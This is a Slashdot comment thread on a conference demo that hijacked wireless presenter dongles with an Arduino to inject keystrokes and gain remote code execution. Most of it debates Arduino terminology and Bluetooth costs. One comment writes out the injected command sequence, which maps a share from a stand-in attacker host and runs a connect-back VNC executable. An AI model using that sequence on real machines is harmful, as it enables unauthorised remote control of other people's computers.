Wireless Presenters Attacked Using an Arduino 69
An anonymous reader writes "This week Dutch security researcher Niels Teusink described a method of attacking wireless presenter devices at an Amsterdam security conference. He had a demo showing how it is possible to use an Arduino and Metasploit to get remote code execution by sending arbitrary keystrokes to the presenter dongle. He has now released the code and made a blog post explaining how it all works. Better watch out the next time you're giving a presentation using one of these devices!"
Re:Microcontroller, not Arduino (Score:5, Informative)
Strictly speaking, Arduinos aren't microcontrollers. They're a popular hobbyist embedded platform based around the Atmel AVR microcontroller family. Much like Dells are a particular brand of computer based around x86 architecture microprocessors.
But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.
Re:Harmless (Score:2, Informative)
Re:Hacking (Score:3, Informative)
Did you rta? He demoed getting a Metasploit payload on the system
Re:Microcontroller, not Arduino (Score:4, Informative)
Re:Microcontroller, not Arduino (Score:3, Informative)
Well, technically, Arduinos are defined as whatever Smart Projects labels an Arduino (it's their trademark). However, yeah, Arduinos (in common usage) are defined more by their software rather than their hardware(in particular, a compatible bootloader that works with the Arduino development environment), because you don't really need much hardware to make a modern microcontroller run.
Which really just goes on to prove that there isn't anything special about Arduino at all. It's really just a bog-standard simple microcontroller breakout board (power regulator, serial I/O either via RS232 or USB, and pin headers for the micro pins) and a standard bootloader and development environment, using a slightly cooked version of C/C++ for programming (they just pre-include a header and tack on a standard main() before feeding it to GCC). Everything else is just positive feedback: Arduino is popular, so people use Arduino, so there's a large community of projects and examples and prewritten code, so Arduino becomes more popular.
I started off with microcontrollers using a crappy development board for PIC micros quite a few years back, and quickly outgrew it and have never really bothered with dev boards ever since. There isn't much of a point when you literally just feed the micro power and ground and it runs. I've built projects where the number of support components for the micro was literally zero (one, if you count the programming connector).
RTFA? (Score:5, Informative)
It's clear that you and the moderators haven't bothered to actually read the article. The research and tools used for the attack were non-trivial, and the impact is remote code execution.
Re:This is why standard protocols help (Score:3, Informative)
AFAIK, Bluetooth is License-free. That is, the protocol, and all related specifications are free for implementation.
Of course you may still need to pay a little for a chip that implements it, but the same thing goes for any wireless chip, and I doubt Bluetooth is THAT much more expensive?
Re:This is why standard protocols help (Score:5, Informative)
Whereas your average Arduino board is about $20-30 or so, an Arduino board with Bluetooth costs about $150.
http://www.sparkfun.com/commerce/tutorial_info.php?tutorials_id=148 [sparkfun.com]
Yes, Bluetooth is that expensive. The ArduinoBT board uses an off-the-shelf BlueGiga WT11. Newark sells those for about $60.
http://www.newark.com/bluegiga/wt11-a-ai/class-1-bluetooth-2-0-edr-module/dp/15P4005 [newark.com]
Mind you, this is a Class 1 (i.e. long range) transmitter, using BT 2.0 and not BT 2.1. Compare this to a standard RF transmitter and receiver, which is a couple bucks per chip...
Re:RTFA? (Score:1, Informative)
Here's the super leet exploit from the article:
# [Win+R]
# net use X: http://attacker/webdavshare
# X:\VNCconnectback.exe
# [enter]
Attacker does this by sending keycode signals over RF, pretending to be the presenter's wireless remote. The hard part was reverse engineering presenter commands (he finds that replaying them works), and sniffing through channels to find the channel the presenter is using.
I'm in full agreement with the GP.
Re:Microcontroller, not Arduino (Score:3, Informative)
But yes, "Arduino this", "Arduino that" gets tiring after a while. Arduinos have a huge following, but there are zillions of alternatives of all shapes and sizes (many of them better in many ways). There's nothing Arduino-specific about this hack.
What's cool about Arduino is how it reduces development time through the use of readily available shields. So if he used any of them then it's worth mentioning and not if not (I skimmed but did not actually read the article, I didn't notice ANY of the Arduino details, but I did get momentarily flustered about the idea of owning a USBee.)
Speaking of cool stuff I could own, can anyone recommend a cheap USB JTAG with Windows and Linux support? I would accept RS232 as a second option. LPT is not eligible.
Re:This is why standard protocols help (Score:3, Informative)
Yeah, but then the maker would have to licence the technology and that adds cost. The chip used in the device doesn't come with Bluetooth. It's a very simple chip.
If there is demand, Wal-Mart will be happy to sell an unlicensed Bluetooth transmitter like the ones you can buy from DealExtreme, except in some packaging more elaborate than that usually used for crack rocks (i.e. a tiny ziploc.) That will help keep the costs down. :)
Of course, if all us nerds just tell all our non-nerd friends to stop buying the non-Bluetooth versions because they're broadcasting their passwords to the world, then a percentage of them will listen, and we can help stick a nail in the coffin of the various nonstandard devices. As much as I hate to see a proprietary, and possibly expensively licensed (who can say? it's not like they publish a fee schedule) protocol pushed all over everything, Bluetooth is the best thing around today.
Re:This is why standard protocols help (Score:3, Informative)
Hello? You can buy Bluetooth-USB-modules for as little as $3 from Amazon. And that is the price for a single item sold to a consumer. The prices of development-kit-level items is hardly comparable to the actual price to implement Bluetooth in a mass-produced gizmo.
I wonder how come you didn't find that the 433MHz wireless modems cost $40 at Sparkfun as well..
I believe a large reason, if not the largest, for not using Bluetooth in simple wireless gadgets is the amount of electricity it takes compared to a simpler custom-protocol device on the 433MHz band.
Re:This is why standard protocols help (Score:4, Informative)
Do you mean the Bluetooth USB modules used to add Bluetooth support to a PC that doesn't have it? Unfortunately, an embedded system doesn't have a desktop-class processor to run the Bluetooth stack.
Oh, and those el-cheap-o Bluetooth modules you're suggesting are probably very out-dated, which is why they're so cheap. That $3 module probably cost more when it was less than a year old and they weren't trying to dump the inventory that they can't sell at a higher price...
Re:Better attack (Score:3, Informative)